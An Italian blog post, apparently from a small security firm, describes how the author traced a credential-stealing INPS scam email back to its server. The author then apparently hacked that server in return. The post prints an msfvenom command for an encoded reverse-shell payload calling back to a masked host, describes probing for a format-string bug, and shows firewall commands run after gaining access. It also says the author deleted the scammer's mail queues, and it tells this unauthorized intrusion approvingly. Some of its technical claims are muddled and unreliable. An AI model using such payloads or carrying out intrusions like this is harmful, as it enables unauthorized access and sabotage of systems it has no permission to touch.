{"id":388,"date":"2020-10-01T16:01:25","date_gmt":"2020-10-01T14:01:25","guid":{"rendered":"https:\/\/lalospace.com\/?p=388"},"modified":"2020-10-29T15:05:42","modified_gmt":"2020-10-29T14:05:42","slug":"spammer-vs-lalospace","status":"publish","type":"post","link":"https:\/\/lalospace.com\/?p=388","title":{"rendered":"Scammer VS Lalospace"},"content":{"rendered":"\n<p class=\"has-normal-font-size\">Oggi alle 6:17 AM un nostro cliente riceve la seguente mail completamente sgrammaticata proveniente da <strong>Grande &lt;amico@prevociale.com><\/strong> Firmata <em>Vincenzo Damato<\/em>.<\/p>\n\n\n\n<p class=\"has-normal-font-size\">Viene allegato un xls protetto da password che richiede delle credenziali di autenticazione a servizi online dell&#8217; inps e le invia con delle macro in POST a un sever lamp.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"416\" src=\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam-1024x416.png\" alt=\"\" class=\"wp-image-391\" srcset=\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam-1024x416.png 1024w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam-300x122.png 300w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam-768x312.png 768w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam-1536x624.png 1536w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam-100x41.png 100w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam-862x350.png 862w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam-1200x488.png 1200w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam.png 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption>Mail di Scam<\/figcaption><\/figure>\n\n\n\n<p>Riceviamo come tutti decine di mail di spam\/scam all&#8217; anno na questa volta ho personalmente voluto andare un&#8217;p\u00f2 pi\u00f9 a fondo.<\/p>\n\n\n\n<p>Cerco il provider che lo ospita e lo denuncio ad abuse ma non accade nulla, \u00e8 la prima volta che denuncio e non so cosa mi aspettavo di ricevere, un &#8220;bravo&#8221; un &#8220;grazie adesso chiudiamo tutto&#8221; invece non succede nulla.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"612\" height=\"367\" src=\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/whois-hosting.png\" alt=\"\" class=\"wp-image-400\" srcset=\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/whois-hosting.png 612w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/whois-hosting-300x180.png 300w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/whois-hosting-100x60.png 100w\" sizes=\"auto, (max-width: 612px) 100vw, 612px\" \/><figcaption>Whois del provider che fornisce i server<\/figcaption><\/figure>\n\n\n\n<p>Decido di indagare, eseguo una scansione blanda sul server di provenienza e si tratta del classico server Linux, in questo caso Centos con una valanga di servizi esposti, certi sono pure abbastanza out of date.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"588\" height=\"294\" src=\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/nmap-sv.png\" alt=\"\" class=\"wp-image-392\" srcset=\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/nmap-sv.png 588w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/nmap-sv-300x150.png 300w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/nmap-sv-100x50.png 100w\" sizes=\"auto, (max-width: 588px) 100vw, 588px\" \/><figcaption>Output Nmap<\/figcaption><\/figure>\n\n\n\n<p>Mi colpisce apache 2.2.15 abbastanza famoso per il reverse proxy exposure del 2011, mi sembra molto strano trovare in &#8220;produzione&#8221; un server cosi vecchio, recupero allora il <strong>core.c<\/strong> della versione operativa e della versione 2.2.34 e li analizzo per capire se esistono differenze sostanziali nelle risposte di una versione patchata, nel mio caso lo ho testato su una 2.2.15 patchata CVE-2017-9798 confrontato a una 2.2.34.<\/p>\n\n\n\n<p>Faccio un veloce deploy di laboratorio e comincio a confrontare le riposte che risultano essere competamente differenti, lo stack pointer AP_CORE_DECLARE non risulta nemmeno esserci pi\u00f9.<\/p>\n\n\n\n<p>Sono punto a capo o lo scammer \u00e8 bravo e maschera il versioning dei servizi o lo scanner ha sbagliato a confrontare i fingerprint, raro ma pu\u00f2 succedere. Abbandono quindi Apache.<\/p>\n\n\n\n<p>cbdev cmail smtpd?? A quanto pare \u00e8 un set di protocolli modulari dedicati allo scambio di internet exchange message, in sostanza un mailserver&#8230;non lo conoscevo&#8230;<\/p>\n\n\n\n<p>Converto subito la macchina apache di test in docker-&gt;cmail e qui comincio a perderci qualche ora, tento la via degli shortwrites, leggo e poi scrivo su indirizzi di memoria arbitrari ma non ho controllo dei buffer perch\u00e8 docker fa qualcosa di strano che non ho ancora compreso. <\/p>\n\n\n\n<p>Con pmap cerco di creare una mappa logica ai servizi in ascolto in modo da isolare i buffer di memoria per ogni servizio, comincio a creare un socket che che invia strighe ricorsive al servizio dispatchd, controllo il comporamento dei buffer e confronto i byte scritti(inviati) con quelli letti(ricevuti) e non coincidono.<\/p>\n\n\n\n<p>Sospetto un format string vulnerability in C capita che dei programmatori utilizzino printf(stringa) omettendo il %s quindi printf(&#8220;%s&#8221;,stringa) , entrambi i metodi funzionano ma se la stringa contiene un parametro di formato %x esadecimale in four-byte possiamo esaminare ripetutamente lo stack memory del processo che contiene la funzione.<\/p>\n\n\n\n<p>Scrivo un piccolo tool per loggare e dimensionare gli indirizzi dei buffer per il processi di dispatchd e li salvo su un file di testo. Sublime Text e trovo una serie finita e ripetuta di 0x25, 0x30, 0x38, 0x78 (sono inversi causa little-endian). Questa serie fa parte della memoria del format string stesso e questo mi permette di passare in input direttamente il formato di stringa cosi a questo punto ho 1) indirizzi e dimensione dei buffer 2) l&#8217;indirizzo di memoria da scrivere per cambiare parametro di stringa e con un reverse tcp payload posso tentare un injection.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>msfvenom  -p linux\/x86\/shell_reverse_tcp LHOST=********* LPORT=6783 -e x86\/shikata_ga_nai -b \"\\x78\\x38\\x30\\x25\\x08\\x00\\x08\" -f c<\/code><\/pre>\n\n\n\n<p>Fino ad ora ho lavorato in ambiente di test e ora diventa complicato poter scrivere certe cose su un blog pubblico ma dopo circa mezz&#8217;ora:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># firewall-cmd --get-active-zones\n# firewall-cmd --zone=public --add-port=1055\/tcp --permanent<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"587\" height=\"230\" src=\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/nmap.png\" alt=\"\" class=\"wp-image-398\" srcset=\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/nmap.png 587w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/nmap-300x118.png 300w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/nmap-100x39.png 100w\" sizes=\"auto, (max-width: 587px) 100vw, 587px\" \/><figcaption>Output Nmap<\/figcaption><\/figure>\n\n\n\n<p>Il tizio utilizza un tool di analisi molto famoso e costoso &#8220;PowerMTA&#8221; di SparkPost.<\/p>\n\n\n\n<p>Gli MTA attivi per scammare:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"751\" src=\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Screenshot_2020-10-01-PowerMTA-Web-Monitor-1024x751.png\" alt=\"\" class=\"wp-image-402\" srcset=\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Screenshot_2020-10-01-PowerMTA-Web-Monitor-1024x751.png 1024w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Screenshot_2020-10-01-PowerMTA-Web-Monitor-300x220.png 300w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Screenshot_2020-10-01-PowerMTA-Web-Monitor-768x563.png 768w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Screenshot_2020-10-01-PowerMTA-Web-Monitor-100x73.png 100w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Screenshot_2020-10-01-PowerMTA-Web-Monitor-862x632.png 862w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Screenshot_2020-10-01-PowerMTA-Web-Monitor.png 1076w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption>PowerMTA lista dei Mail Transfer Agents<\/figcaption><\/figure>\n\n\n\n<p>Ed a quanto pare ha una console di gestione:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"921\" src=\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Screenshot_2020-10-01-PowerMTA-Web-Monitor-Licence-1-1024x921.png\" alt=\"\" class=\"wp-image-403\" srcset=\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Screenshot_2020-10-01-PowerMTA-Web-Monitor-Licence-1-1024x921.png 1024w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Screenshot_2020-10-01-PowerMTA-Web-Monitor-Licence-1-300x270.png 300w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Screenshot_2020-10-01-PowerMTA-Web-Monitor-Licence-1-768x691.png 768w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Screenshot_2020-10-01-PowerMTA-Web-Monitor-Licence-1-100x90.png 100w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Screenshot_2020-10-01-PowerMTA-Web-Monitor-Licence-1-862x775.png 862w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Screenshot_2020-10-01-PowerMTA-Web-Monitor-Licence-1.png 1062w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption>PowerMTA command web tools<\/figcaption><\/figure>\n\n\n\n<p>Mi limito a dire che ho eliminato le queue su tutti i domini.<\/p>\n\n\n\n<p>Ma la parte pi\u00f9 divertente \u00e8 questa, il furbo ha registrato la licenza PowerMTA sotto un account skype attivo. ( aa.bb.1 )<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"884\" height=\"758\" src=\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/licenza.png\" alt=\"\" class=\"wp-image-405\" srcset=\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/licenza.png 884w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/licenza-300x257.png 300w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/licenza-768x659.png 768w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/licenza-100x86.png 100w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/licenza-862x739.png 862w\" sizes=\"auto, (max-width: 884px) 100vw, 884px\" \/><figcaption>PowerMTA dettagli licenza<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"438\" height=\"277\" src=\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/skype.png\" alt=\"\" class=\"wp-image-409\" srcset=\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/skype.png 438w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/skype-300x190.png 300w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/skype-100x63.png 100w\" sizes=\"auto, (max-width: 438px) 100vw, 438px\" \/><figcaption>Skype on Iphone<\/figcaption><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Non so ancora se scrivergli o lasciar perdere fatto sta che questi stanno truffando da mesi. <a href=\"https:\/\/www.inps.it\/nuovoportaleinps\/default.aspx?itemdir=54020\">14 Luglio 2020 sito Inps<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"709\" height=\"407\" src=\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/prev.png\" alt=\"\" class=\"wp-image-408\" srcset=\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/prev.png 709w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/prev-300x172.png 300w, https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/prev-100x57.png 100w\" sizes=\"auto, (max-width: 709px) 100vw, 709px\" \/><\/figure>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Oggi alle 6:17 AM un nostro cliente riceve la seguente mail completamente sgrammaticata proveniente da Grande &lt;amico@prevociale.com> Firmata Vincenzo Damato. Viene allegato un xls protetto da password che richiede delle credenziali di autenticazione a servizi online dell&#8217; inps e le invia con delle macro in POST a un sever lamp. Riceviamo come tutti decine di mail di spam\/scam all&#8217; anno &#8230; <\/p>\n<div><a href=\"https:\/\/lalospace.com\/?p=388\" class=\"more-link\">Read More<\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-388","post","type-post","status-publish","format-standard","hentry","category-senza-categoria","no-post-thumbnail"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Scammer VS Lalospace - LALOSPACE<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/lalospace.com\/?p=388\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Scammer VS Lalospace - LALOSPACE\" \/>\n<meta property=\"og:description\" content=\"Oggi alle 6:17 AM un nostro cliente riceve la seguente mail completamente sgrammaticata proveniente da Grande &lt;amico@prevociale.com&gt; Firmata Vincenzo Damato. Viene allegato un xls protetto da password che richiede delle credenziali di autenticazione a servizi online dell&#8217; inps e le invia con delle macro in POST a un sever lamp. Riceviamo come tutti decine di mail di spam\/scam all&#8217; anno ... Read More\" \/>\n<meta property=\"og:url\" content=\"https:\/\/lalospace.com\/?p=388\" \/>\n<meta property=\"og:site_name\" content=\"LALOSPACE\" \/>\n<meta property=\"article:published_time\" content=\"2020-10-01T14:01:25+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-10-29T14:05:42+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam-1024x416.png\" \/>\n<meta name=\"author\" content=\"lalospace\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Scritto da\" \/>\n\t<meta name=\"twitter:data1\" content=\"lalospace\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/lalospace.com\/?p=388#article\",\"isPartOf\":{\"@id\":\"https:\/\/lalospace.com\/?p=388\"},\"author\":{\"name\":\"lalospace\",\"@id\":\"https:\/\/lalospace.com\/#\/schema\/person\/0a6048289f5b8f29b5982a642fb8bd90\"},\"headline\":\"Scammer VS Lalospace\",\"datePublished\":\"2020-10-01T14:01:25+00:00\",\"dateModified\":\"2020-10-29T14:05:42+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/lalospace.com\/?p=388\"},\"wordCount\":683,\"publisher\":{\"@id\":\"https:\/\/lalospace.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/lalospace.com\/?p=388#primaryimage\"},\"thumbnailUrl\":\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam-1024x416.png\",\"inLanguage\":\"it-IT\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/lalospace.com\/?p=388\",\"url\":\"https:\/\/lalospace.com\/?p=388\",\"name\":\"Scammer VS Lalospace - LALOSPACE\",\"isPartOf\":{\"@id\":\"https:\/\/lalospace.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/lalospace.com\/?p=388#primaryimage\"},\"image\":{\"@id\":\"https:\/\/lalospace.com\/?p=388#primaryimage\"},\"thumbnailUrl\":\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam-1024x416.png\",\"datePublished\":\"2020-10-01T14:01:25+00:00\",\"dateModified\":\"2020-10-29T14:05:42+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/lalospace.com\/?p=388#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/lalospace.com\/?p=388\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/lalospace.com\/?p=388#primaryimage\",\"url\":\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam.png\",\"contentUrl\":\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam.png\",\"width\":1600,\"height\":650},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/lalospace.com\/?p=388#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/lalospace.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Scammer VS Lalospace\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/lalospace.com\/#website\",\"url\":\"https:\/\/lalospace.com\/\",\"name\":\"LALOSPACE\",\"description\":\"Reti e infrastrutture Server , Cybersecurity a Belluno\",\"publisher\":{\"@id\":\"https:\/\/lalospace.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/lalospace.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/lalospace.com\/#organization\",\"name\":\"LaloSpace\",\"url\":\"https:\/\/lalospace.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/lalospace.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/07\/logolalospace.png\",\"contentUrl\":\"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/07\/logolalospace.png\",\"width\":500,\"height\":500,\"caption\":\"LaloSpace\"},\"image\":{\"@id\":\"https:\/\/lalospace.com\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/lalospace.com\/#\/schema\/person\/0a6048289f5b8f29b5982a642fb8bd90\",\"name\":\"lalospace\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/lalospace.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/454439e293539e2588c8f8bead321a7495960c5f22f010d27fd7f4385754fdb5?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/454439e293539e2588c8f8bead321a7495960c5f22f010d27fd7f4385754fdb5?s=96&d=mm&r=g\",\"caption\":\"lalospace\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Scammer VS Lalospace - LALOSPACE","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/lalospace.com\/?p=388","og_locale":"it_IT","og_type":"article","og_title":"Scammer VS Lalospace - LALOSPACE","og_description":"Oggi alle 6:17 AM un nostro cliente riceve la seguente mail completamente sgrammaticata proveniente da Grande &lt;amico@prevociale.com> Firmata Vincenzo Damato. Viene allegato un xls protetto da password che richiede delle credenziali di autenticazione a servizi online dell&#8217; inps e le invia con delle macro in POST a un sever lamp. Riceviamo come tutti decine di mail di spam\/scam all&#8217; anno ... Read More","og_url":"https:\/\/lalospace.com\/?p=388","og_site_name":"LALOSPACE","article_published_time":"2020-10-01T14:01:25+00:00","article_modified_time":"2020-10-29T14:05:42+00:00","og_image":[{"url":"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam-1024x416.png","type":"","width":"","height":""}],"author":"lalospace","twitter_card":"summary_large_image","twitter_misc":{"Scritto da":"lalospace","Tempo di lettura stimato":"4 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/lalospace.com\/?p=388#article","isPartOf":{"@id":"https:\/\/lalospace.com\/?p=388"},"author":{"name":"lalospace","@id":"https:\/\/lalospace.com\/#\/schema\/person\/0a6048289f5b8f29b5982a642fb8bd90"},"headline":"Scammer VS Lalospace","datePublished":"2020-10-01T14:01:25+00:00","dateModified":"2020-10-29T14:05:42+00:00","mainEntityOfPage":{"@id":"https:\/\/lalospace.com\/?p=388"},"wordCount":683,"publisher":{"@id":"https:\/\/lalospace.com\/#organization"},"image":{"@id":"https:\/\/lalospace.com\/?p=388#primaryimage"},"thumbnailUrl":"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam-1024x416.png","inLanguage":"it-IT"},{"@type":"WebPage","@id":"https:\/\/lalospace.com\/?p=388","url":"https:\/\/lalospace.com\/?p=388","name":"Scammer VS Lalospace - LALOSPACE","isPartOf":{"@id":"https:\/\/lalospace.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/lalospace.com\/?p=388#primaryimage"},"image":{"@id":"https:\/\/lalospace.com\/?p=388#primaryimage"},"thumbnailUrl":"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam-1024x416.png","datePublished":"2020-10-01T14:01:25+00:00","dateModified":"2020-10-29T14:05:42+00:00","breadcrumb":{"@id":"https:\/\/lalospace.com\/?p=388#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/lalospace.com\/?p=388"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/lalospace.com\/?p=388#primaryimage","url":"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam.png","contentUrl":"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/10\/Mail-Scam.png","width":1600,"height":650},{"@type":"BreadcrumbList","@id":"https:\/\/lalospace.com\/?p=388#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/lalospace.com\/"},{"@type":"ListItem","position":2,"name":"Scammer VS Lalospace"}]},{"@type":"WebSite","@id":"https:\/\/lalospace.com\/#website","url":"https:\/\/lalospace.com\/","name":"LALOSPACE","description":"Reti e infrastrutture Server , Cybersecurity a Belluno","publisher":{"@id":"https:\/\/lalospace.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/lalospace.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Organization","@id":"https:\/\/lalospace.com\/#organization","name":"LaloSpace","url":"https:\/\/lalospace.com\/","logo":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/lalospace.com\/#\/schema\/logo\/image\/","url":"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/07\/logolalospace.png","contentUrl":"https:\/\/lalospace.com\/wp-content\/uploads\/2020\/07\/logolalospace.png","width":500,"height":500,"caption":"LaloSpace"},"image":{"@id":"https:\/\/lalospace.com\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/lalospace.com\/#\/schema\/person\/0a6048289f5b8f29b5982a642fb8bd90","name":"lalospace","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/lalospace.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/454439e293539e2588c8f8bead321a7495960c5f22f010d27fd7f4385754fdb5?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/454439e293539e2588c8f8bead321a7495960c5f22f010d27fd7f4385754fdb5?s=96&d=mm&r=g","caption":"lalospace"}}]}},"_links":{"self":[{"href":"https:\/\/lalospace.com\/index.php?rest_route=\/wp\/v2\/posts\/388","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lalospace.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lalospace.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lalospace.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lalospace.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=388"}],"version-history":[{"count":14,"href":"https:\/\/lalospace.com\/index.php?rest_route=\/wp\/v2\/posts\/388\/revisions"}],"predecessor-version":[{"id":714,"href":"https:\/\/lalospace.com\/index.php?rest_route=\/wp\/v2\/posts\/388\/revisions\/714"}],"wp:attachment":[{"href":"https:\/\/lalospace.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=388"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lalospace.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=388"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lalospace.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=388"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}